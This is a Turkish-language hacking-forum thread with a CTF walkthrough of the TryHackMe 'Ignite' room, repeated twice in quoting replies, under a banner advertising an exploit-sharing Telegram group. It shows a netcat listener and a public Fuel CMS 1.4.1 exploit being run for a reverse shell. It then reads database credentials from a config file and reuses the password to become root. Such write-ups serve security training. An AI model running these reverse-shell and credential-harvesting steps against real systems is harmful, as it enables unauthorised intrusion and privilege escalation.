exploit paylaşım grubumuz: t.me/HTTPwnn

TryHackMe Ignite Odası Walkthrough | Detaylı Anlatım

Katılım
21 Haz 2026
Mesaj
169
Reaksiyon
161
Puan
28
Konum
Antalya
xentr_thread_starter



TryHackMe - Ignite Walkthrough

Fuel CMS 1.4.1 | Initial Access → Privilege Escalation → Root








Merhaba WarNight üyeleri,

Bu konuda TryHackMe platformundaki Ignite odasının çözümünü adım adım inceleyeceğiz. Makine üzerinde ilk erişimi elde ettikten sonra kullanıcı flag'ını alacak, ardından yetki yükselterek root olacağız.

Bu rehber başlangıç seviyesindeki kullanıcıların da rahatlıkla takip edebileceği şekilde hazırlanmıştır.





Root It


Hedefe İlk Bakış​



İlk olarak verilen IP adresini tarayıcıda açıyoruz.

1782520710875.png




Sayfayı incelediğimizde sitenin Fuel CMS 1.4.1 kullandığını görüyoruz.

Bu bilgi oldukça önemli çünkü sürüm bilgisi doğrudan zafiyet araştırması yapmamıza imkan sağlar.

[INFO]
İpucu

Google'da;

Fuel CMS 1.4.1 exploit

şeklinde arama yaptığınızda birden fazla sonuç göreceksiniz.
[/INFO]



1782520724003.png



Ben bu makalede GitHub üzerindeki güncel exploit'i kullanacağım.





Exploit'i Çalıştırma​



Önce listener açıyoruz.

Bash:
nc -lvnp 1337

Ardından exploit'i çalıştırıyoruz.

Bash:
python3 Fuel-Updated.py http://TARGET_IP YOUR_IP 1337



1782520733474.png




Shell bağlantısı geldikten sonra TTY yükseltiyoruz.

Bash:
export TERM=xterm

python3 -c 'import pty;pty.spawn("/bin/bash")'

Ardından User Flag'i okuyabiliriz.

Bash:
cat /home/www-data/flag.txt



1782520739305.png




[SUCCESS]
İlk flag başarıyla elde edildi.
[/SUCCESS]





Root Yetkisi Alma


Fuel CMS yapılandırma dosyasında veritabanı bilgileri tutulmaktadır.

Bash:
cd fuel/application/config

cat database.php



1782520745175.png




Dosya içerisinde kullanıcı adı ve parola bilgileri yer almaktadır.

Bu bilgileri kullanarak root kullanıcısına geçiyoruz.

Bash:
su

Password:
mememe

Son olarak root flag'ını okuyoruz.

Bash:
cat /root/root.txt



1782520750783.png
1782520755235.png











Bir sonraki TryHackMe çözümünde görüşmek üzere.



 



TryHackMe - Ignite Walkthrough

Fuel CMS 1.4.1 | Initial Access → Privilege Escalation → Root








Merhaba WarNight üyeleri,

Bu konuda TryHackMe platformundaki Ignite odasının çözümünü adım adım inceleyeceğiz. Makine üzerinde ilk erişimi elde ettikten sonra kullanıcı flag'ını alacak, ardından yetki yükselterek root olacağız.

Bu rehber başlangıç seviyesindeki kullanıcıların da rahatlıkla takip edebileceği şekilde hazırlanmıştır.





Root It


Hedefe İlk Bakış​



İlk olarak verilen IP adresini tarayıcıda açıyoruz.

Ek dosyayı görüntüle: 290




Sayfayı incelediğimizde sitenin Fuel CMS 1.4.1 kullandığını görüyoruz.

Bu bilgi oldukça önemli çünkü sürüm bilgisi doğrudan zafiyet araştırması yapmamıza imkan sağlar.

[INFO]
İpucu

Google'da;

Fuel CMS 1.4.1 exploit

şeklinde arama yaptığınızda birden fazla sonuç göreceksiniz.
[/INFO]



Ek dosyayı görüntüle: 291



Ben bu makalede GitHub üzerindeki güncel exploit'i kullanacağım.





Exploit'i Çalıştırma​



Önce listener açıyoruz.

Bash:
nc -lvnp 1337

Ardından exploit'i çalıştırıyoruz.

Bash:
python3 Fuel-Updated.py http://TARGET_IP YOUR_IP 1337



Ek dosyayı görüntüle: 292




Shell bağlantısı geldikten sonra TTY yükseltiyoruz.

Bash:
export TERM=xterm

python3 -c 'import pty;pty.spawn("/bin/bash")'

Ardından User Flag'i okuyabiliriz.

Bash:
cat /home/www-data/flag.txt



Ek dosyayı görüntüle: 293




[SUCCESS]
İlk flag başarıyla elde edildi.
[/SUCCESS]





Root Yetkisi Alma


Fuel CMS yapılandırma dosyasında veritabanı bilgileri tutulmaktadır.

Bash:
cd fuel/application/config

cat database.php



Ek dosyayı görüntüle: 294




Dosya içerisinde kullanıcı adı ve parola bilgileri yer almaktadır.

Bu bilgileri kullanarak root kullanıcısına geçiyoruz.

Bash:
su

Password:
mememe

Son olarak root flag'ını okuyoruz.

Bash:
cat /root/root.txt



Ek dosyayı görüntüle: 295
Ek dosyayı görüntüle: 296











Bir sonraki TryHackMe çözümünde görüşmek üzere.



es resimli guzel anlatim olmus
 



TryHackMe - Ignite Walkthrough

Fuel CMS 1.4.1 | Initial Access → Privilege Escalation → Root








Merhaba WarNight üyeleri,

Bu konuda TryHackMe platformundaki Ignite odasının çözümünü adım adım inceleyeceğiz. Makine üzerinde ilk erişimi elde ettikten sonra kullanıcı flag'ını alacak, ardından yetki yükselterek root olacağız.

Bu rehber başlangıç seviyesindeki kullanıcıların da rahatlıkla takip edebileceği şekilde hazırlanmıştır.





Root It


Hedefe İlk Bakış​



İlk olarak verilen IP adresini tarayıcıda açıyoruz.

Ek dosyayı görüntüle: 290




Sayfayı incelediğimizde sitenin Fuel CMS 1.4.1 kullandığını görüyoruz.

Bu bilgi oldukça önemli çünkü sürüm bilgisi doğrudan zafiyet araştırması yapmamıza imkan sağlar.

[INFO]
İpucu

Google'da;

Fuel CMS 1.4.1 exploit

şeklinde arama yaptığınızda birden fazla sonuç göreceksiniz.
[/INFO]



Ek dosyayı görüntüle: 291



Ben bu makalede GitHub üzerindeki güncel exploit'i kullanacağım.





Exploit'i Çalıştırma​



Önce listener açıyoruz.

Bash:
nc -lvnp 1337

Ardından exploit'i çalıştırıyoruz.

Bash:
python3 Fuel-Updated.py http://TARGET_IP YOUR_IP 1337



Ek dosyayı görüntüle: 292




Shell bağlantısı geldikten sonra TTY yükseltiyoruz.

Bash:
export TERM=xterm

python3 -c 'import pty;pty.spawn("/bin/bash")'

Ardından User Flag'i okuyabiliriz.

Bash:
cat /home/www-data/flag.txt



Ek dosyayı görüntüle: 293




[SUCCESS]
İlk flag başarıyla elde edildi.
[/SUCCESS]





Root Yetkisi Alma


Fuel CMS yapılandırma dosyasında veritabanı bilgileri tutulmaktadır.

Bash:
cd fuel/application/config

cat database.php



Ek dosyayı görüntüle: 294




Dosya içerisinde kullanıcı adı ve parola bilgileri yer almaktadır.

Bu bilgileri kullanarak root kullanıcısına geçiyoruz.

Bash:
su

Password:
mememe

Son olarak root flag'ını okuyoruz.

Bash:
cat /root/root.txt



Ek dosyayı görüntüle: 295
Ek dosyayı görüntüle: 296











Bir sonraki TryHackMe çözümünde görüşmek üzere.



e.s
 
Geri
En Üst